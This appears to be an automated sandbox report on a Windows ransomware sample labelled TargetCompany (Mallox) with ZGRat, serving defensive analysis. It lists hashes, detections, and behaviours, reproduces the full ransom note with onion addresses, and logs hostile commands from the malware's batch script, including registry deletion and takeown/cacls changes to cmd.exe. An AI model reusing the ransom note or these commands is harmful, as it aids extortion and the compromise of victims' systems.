targetcompany | 7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3

Analysis

max time kernel
149s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
20-03-2024 10:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe
Size

781KB
MD5

8c3dae7f8388f18459950a52d082c6cf
SHA1

a031d2c05007612632d7923001f2e8f7feb3684b
SHA256

7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3
SHA512

a1073ca7bea224fbac7042e9f1658d675e9a091e0109f2926bc73ce5d6765d9bfeb90e63630ae8489bb4fd0dae510371cb7722a515171a8328660073e3645476
SSDEEP

24576:nTqJEYTeo2Dg9Y4pl+wreDd3Rwa4FZQDQEzm1:cEYTGDkqwreDd3OFZso

Score

10^/10

targetcompany zgrat discovery evasion persistence ransomware rat

Malware Config

Extracted

Path

C:\Users\Admin\Contacts\HOW TO BACK FILES.txt

Family

targetcompany

Ransom Note

Hello Your files are encrypted and can not be used We have downloaded your confidential data and are ready to publish it on our blog To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 6D34072730CAF1FFCDBFD956 5) You will see payment information and we can make free test decryption here 6)After payment, you will receive a tool for decrypting files, and we will delete the data that was taken from you Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: [email protected] Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.�

Emails

[email protected]

URLs

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion

Signatures

Detect ZGRat V1 34 IoCs

resource	yara_rule
behavioral2/memory/2016-2-0x00000171163A0000-0x0000017116464000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-5-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-6-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-10-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-8-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-12-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-14-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-16-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-18-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-20-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-22-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-24-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-26-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-28-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-30-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-32-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-34-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-36-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-38-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-40-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-42-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-44-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-46-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-48-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-50-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-52-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-54-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-56-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-58-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-60-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-62-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-64-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-66-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1
behavioral2/memory/2016-68-0x00000171163A0000-0x000001711645D000-memory.dmp	family_zgrat_v1

TargetCompany,Mallox
TargetCompany (aka Mallox) is a ransomware which encrypts files using a combination of ChaCha20, AES-128, and Curve25519, first seen in June 2021.
ransomware targetcompany
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4892	bcdedit.exe
3700	bcdedit.exe

Renames multiple (1842) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe

Modifies file permissions 1 TTPs 18 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3144	takeown.exe
2016	takeown.exe
4952	takeown.exe
5072	takeown.exe
1420	takeown.exe
4008	takeown.exe
4848	takeown.exe
3068	takeown.exe
836	takeown.exe
4084	takeown.exe
920	takeown.exe
2108	takeown.exe
1664	takeown.exe
4696	takeown.exe
3480	takeown.exe
4552	takeown.exe
1012	takeown.exe
2820	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ecfefvhniue = "C:\\Users\\Admin\\AppData\\Roaming\\Ecfefvhniue.exe"	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\V:	MSBuild.exe
File opened (read-only)	\??\Y:	MSBuild.exe
File opened (read-only)	\??\B:	MSBuild.exe
File opened (read-only)	\??\G:	MSBuild.exe
File opened (read-only)	\??\I:	MSBuild.exe
File opened (read-only)	\??\M:	MSBuild.exe
File opened (read-only)	\??\N:	MSBuild.exe
File opened (read-only)	\??\A:	MSBuild.exe
File opened (read-only)	\??\J:	MSBuild.exe
File opened (read-only)	\??\T:	MSBuild.exe
File opened (read-only)	\??\W:	MSBuild.exe
File opened (read-only)	\??\R:	MSBuild.exe
File opened (read-only)	\??\U:	MSBuild.exe
File opened (read-only)	\??\Z:	MSBuild.exe
File opened (read-only)	\??\D:	MSBuild.exe
File opened (read-only)	\??\E:	MSBuild.exe
File opened (read-only)	\??\K:	MSBuild.exe
File opened (read-only)	\??\L:	MSBuild.exe
File opened (read-only)	\??\P:	MSBuild.exe
File opened (read-only)	\??\H:	MSBuild.exe
File opened (read-only)	\??\O:	MSBuild.exe
File opened (read-only)	\??\Q:	MSBuild.exe
File opened (read-only)	\??\S:	MSBuild.exe
File opened (read-only)	\??\X:	MSBuild.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	api.ipify.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2016 set thread context of 736	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	93

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\tl\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_2019.1111.2029.0_neutral_~_8wekyb3d8bbwe\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-sl\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-ppd.xrm-ms	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial1-pl.xrm-ms	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\hrtfs\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\it-it\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\Microsoft Office\root\loc\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-pl.xrm-ms	MSBuild.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUEPRNT\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusEDUR_Subscription-pl.xrm-ms	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC.HXS	MSBuild.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\tr\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\pl-PL\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\el\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\resources.jar	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ul-phn.xrm-ms	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_de.properties	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses\c2rpridslicensefiles_auto.xml	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTest-ul-oob.xrm-ms	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_KMS_Client-ul.xrm-ms	MSBuild.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ms\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\+Connect to New Data Source.odc	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-sl\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Viewer\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\am-ET\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\loc_archives\en\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-100_8wekyb3d8bbwe\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Professional2019DemoR_BypassTrial180-ppd.xrm-ms	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Light\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\contrast-standard\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\Assets\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sr\HOW TO BACK FILES.txt	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\HOW TO BACK FILES.txt	MSBuild.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
736	MSBuild.exe
736	MSBuild.exe
736	MSBuild.exe
736	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe
Token: SeTakeOwnershipPrivilege	4848	takeown.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeDebugPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	920	takeown.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	3068	takeown.exe
Token: SeTakeOwnershipPrivilege	3480	takeown.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe
Token: SeTakeOwnershipPrivilege	736	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2016 wrote to memory of 4400	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	91
PID 2016 wrote to memory of 4400	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	91
PID 2016 wrote to memory of 736	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	93
PID 2016 wrote to memory of 736	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	93
PID 4400 wrote to memory of 4452	4400	cmd.exe	94
PID 4400 wrote to memory of 4452	4400	cmd.exe	94
PID 2016 wrote to memory of 736	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	93
PID 2016 wrote to memory of 736	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	93
PID 2016 wrote to memory of 736	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	93
PID 2016 wrote to memory of 736	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	93
PID 2016 wrote to memory of 736	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	93
PID 2016 wrote to memory of 736	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	93
PID 2016 wrote to memory of 736	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	93
PID 2016 wrote to memory of 736	2016	7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe	93
PID 4400 wrote to memory of 4848	4400	cmd.exe	95
PID 4400 wrote to memory of 4848	4400	cmd.exe	95
PID 4400 wrote to memory of 2568	4400	cmd.exe	96
PID 4400 wrote to memory of 2568	4400	cmd.exe	96
PID 4400 wrote to memory of 4420	4400	cmd.exe	97
PID 4400 wrote to memory of 4420	4400	cmd.exe	97
PID 4400 wrote to memory of 4644	4400	cmd.exe	98
PID 4400 wrote to memory of 4644	4400	cmd.exe	98
PID 4400 wrote to memory of 4720	4400	cmd.exe	99
PID 4400 wrote to memory of 4720	4400	cmd.exe	99
PID 4400 wrote to memory of 4184	4400	cmd.exe	100
PID 4400 wrote to memory of 4184	4400	cmd.exe	100
PID 4400 wrote to memory of 4940	4400	cmd.exe	101
PID 4400 wrote to memory of 4940	4400	cmd.exe	101
PID 4400 wrote to memory of 4484	4400	cmd.exe	102
PID 4400 wrote to memory of 4484	4400	cmd.exe	102
PID 4400 wrote to memory of 5020	4400	cmd.exe	103
PID 4400 wrote to memory of 5020	4400	cmd.exe	103
PID 4400 wrote to memory of 3408	4400	cmd.exe	104
PID 4400 wrote to memory of 3408	4400	cmd.exe	104
PID 4400 wrote to memory of 2588	4400	cmd.exe	105
PID 4400 wrote to memory of 2588	4400	cmd.exe	105
PID 4400 wrote to memory of 2724	4400	cmd.exe	106
PID 4400 wrote to memory of 2724	4400	cmd.exe	106
PID 4400 wrote to memory of 4144	4400	cmd.exe	107
PID 4400 wrote to memory of 4144	4400	cmd.exe	107
PID 4400 wrote to memory of 1940	4400	cmd.exe	108
PID 4400 wrote to memory of 1940	4400	cmd.exe	108
PID 736 wrote to memory of 1624	736	MSBuild.exe	132
PID 736 wrote to memory of 1624	736	MSBuild.exe	132
PID 4400 wrote to memory of 3168	4400	cmd.exe	110
PID 4400 wrote to memory of 3168	4400	cmd.exe	110
PID 736 wrote to memory of 4508	736	MSBuild.exe	112
PID 736 wrote to memory of 4508	736	MSBuild.exe	112
PID 1624 wrote to memory of 3700	1624	cmd.exe	114
PID 1624 wrote to memory of 3700	1624	cmd.exe	114
PID 4508 wrote to memory of 4892	4508	cmd.exe	115
PID 4508 wrote to memory of 4892	4508	cmd.exe	115
PID 4400 wrote to memory of 664	4400	cmd.exe	116
PID 4400 wrote to memory of 664	4400	cmd.exe	116
PID 4400 wrote to memory of 4648	4400	cmd.exe	117
PID 4400 wrote to memory of 4648	4400	cmd.exe	117
PID 4400 wrote to memory of 920	4400	cmd.exe	120
PID 4400 wrote to memory of 920	4400	cmd.exe	120
PID 4400 wrote to memory of 2920	4400	cmd.exe	121
PID 4400 wrote to memory of 2920	4400	cmd.exe	121
PID 4400 wrote to memory of 1180	4400	cmd.exe	122
PID 4400 wrote to memory of 1180	4400	cmd.exe	122
PID 4400 wrote to memory of 556	4400	cmd.exe	123
PID 4400 wrote to memory of 556	4400	cmd.exe	123

C:\Users\Admin\AppData\Local\Temp\7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe
"C:\Users\Admin\AppData\Local\Temp\7bdbb31e7bdd77f6f6ef704797de21d051ca5843adfa17c29ad82892475346c3.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Kill-Delete.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4400
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
    3⤵
    PID:4452
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\cmd.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2568
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /g Administrators:f
    3⤵
    PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4644
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g Users:r
